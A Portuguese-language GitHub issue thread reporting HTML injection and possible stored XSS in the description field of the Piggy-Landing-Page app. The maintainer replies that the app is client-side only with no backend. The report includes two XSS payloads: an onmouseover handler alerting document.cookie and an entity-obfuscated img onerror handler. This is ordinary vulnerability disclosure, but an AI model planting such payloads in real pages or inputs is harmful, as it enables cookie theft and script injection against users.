### ISSUE TITLE
Xss | Html Injection

### ISSUE THREAD

**Issue by n1ckisthereu** [ruymon/Piggy-Landing-Page#12]
É possível injetar html na descrição, escalável para um stored xss, segue a payload:  
```\<a onmouseover="alert(document.cookie)"\>xxs link\</a\>```

outra payload funcionando:
```<img src=x onerror="&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041">```

Só ir no input de descrição e colar a payload para reproduzir, para reproduzir o html injection é só jogar qualquer tag html no campo de input e salvar!

**Comment by ruymon** [comment]
Obrigado por contribuir com o app, porém seu issue não aparenta estar bem fundamentado. 

Toda a aplicação é client side. Logo, tudo fica junto ao client no LocalStorage. Contudo, não é possível fazer XSS pois nem temos Backend.

Caso eu tenha cometido um erro de interpretação do problema sinta-se a vontade para me mandar uma mensagem no Discord!

Ruyy#1234
